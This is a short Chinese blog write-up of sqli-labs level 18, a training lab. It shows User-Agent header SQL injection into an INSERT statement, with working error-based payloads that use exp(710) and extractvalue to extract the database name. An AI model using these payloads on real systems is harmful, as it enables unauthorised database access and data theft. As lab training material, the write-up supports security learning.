sqllab第十八关通关笔记

知识点:

  • UA注入
    • 不进行url解析,不能使用+ %20 编码等操作
    • 出现在User-agent字段中
    • 一般为insert语句
      • insert 表名(字段1,字段2,。。。) values(数据1,数据2,。。。)

通过admin admin进行登录发现页面打印出了user-agent的信息

说明这是一个UA注入

将UA处的信息进行修改,利用单引号进行测试

构造UA: 1'

发现页面打印除了错误信息;发现后面好像还有两个参数,并且结尾有括号

这里显然不是一个查询语句,也不是一个update语句,可能是insert语句

推测原始语句为 insert into 表名(字段1,字段2,...) values(数据1,数据2,...);

构造payload:1'+and+exp(710)='

发现还是有问题,这就奇怪了

突然想到这个位置好像不能用+,这里是不进行url解析的,换成空格试试

构造payload:1' and exp(710)='

成功执行了exp(710),这里可以进行错误注入

接下来获取数据库名字

构造payload:1' and extractvalue(1,concat(0x7e,database(),0x7e))='

成功获取了数据库名字,获取敏感信息也是同样的操作;收工了

10

相关推荐
β添砖java6 小时前
2025最新快速构建企业级虚拟专用网络环境学习笔记
笔记·学习
qianpeng46 小时前
IDA PRO笔记
笔记
Yang_jie_0310 小时前
笔记:数据结构(顺序表)
数据结构·windows·笔记
Tom@敲代码12 小时前
js学习笔记-01
javascript·笔记·学习
巴巴媛66614 小时前
STM32学习笔记【32.BKP + RTC】
笔记·stm32·学习
能摆一天是一天14 小时前
Spring ai vectorstore 使用本地模型导致只能匹配可行度为1.0的内容的解决方法笔记
java·笔记·spring
进阶的DW15 小时前
Wiki + Graph + RAG 知识库建设笔记2
笔记
AOwhisky15 小时前
Linux(CentOS)系统管理入门笔记(第四期)——文件系统(下篇):文件与目录操作实战——cpmvmkdirrmln
linux·运维·笔记·centos·云计算·文件系统
bmy-happy15 小时前
网安专业课程笔记sale
笔记
浩瀚地学16 小时前
【Java基础复习】IO流(二)
java·开发语言·经验分享·笔记·学习